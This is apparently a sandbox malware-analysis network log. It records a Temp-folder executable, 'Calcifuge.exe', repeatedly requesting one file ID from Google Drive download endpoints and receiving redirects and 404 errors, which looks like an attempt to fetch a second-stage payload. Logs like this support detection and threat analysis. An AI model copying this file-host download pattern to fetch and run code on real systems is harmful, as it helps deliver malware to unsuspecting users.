                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:52:31 UTC | 258 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
2025-01-11 02:52:31 UTC | 2229 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQXUdQ-gSJtroZqw5zw6RaJ4OchFfrKYDwi5vJjFD6OF2m8DHNJH0_2GPXoIOxNGpYY
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:31 GMT
                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-a15_tYGTfByt35S0CAjxlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Set-Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA; expires=Sun, 13-Jul-2025 02:52:31 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:31 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CYENEgVxw29lNYhjBxW6DA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              2 | 192.168.2.4 | 49738 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:32 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:32 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:32 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-Mtco3-EMxnrg_-DzabutWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              3 | 192.168.2.4 | 53459 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:33 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:33 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC49DtT0F5CMiwKmH3o6B4pfBMElBHuGUKMjjyPhhOHQO_aeDiyjQOwWZwEEdbYyIRIv
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:33 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-oWpfUiVCRk5qqBgeCySB0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:33 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e3HyFmmQT2Y7gt-s4oLujQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              4 | 192.168.2.4 | 53460 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:34 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:35 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:35 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-A_OOQar8YrAtKffhKr9fFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              5 | 192.168.2.4 | 53461 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:35 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:36 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTbs1P9oRgujbOEyJ3yx0iW3l913ZP37ugmvoLSTeUuYUTdGSfrEsqF5tVok1XkqdRP
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:36 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-W0pOL_5HAhjlq32MQY2aFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:36 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7IhEGkzAIYn1nI1EFlxpXw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              6 | 192.168.2.4 | 53462 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:37 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:37 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:37 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-hN755_qBlwwpxz50qoz6Gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              7 | 192.168.2.4 | 53463 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:38 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:38 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSGhacbtpB3ODSnNKll6IKbOlCgw_V5bboHw9rAYJI8PoOsLEy-fe6Yc6vZXFZTJK9HNYyDZ40
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:38 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-woyzqQFrcQnuiPGGGptLZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:38 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BlVklxFEijpuqSH7ZODyDQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              8 | 192.168.2.4 | 53464 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:39 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:39 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:39 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'nonce-OWLEpDK-44HcNSCEithxPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              9 | 192.168.2.4 | 53465 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:40 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:40 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6KCOiy9RgdqzvIzD9vNkapPiokd7Z8kQibYYOHk8djs0BqkkEy46z0qDNanPr4DWBU
                                                                                              Content-Type: text/html; charset=utf-8
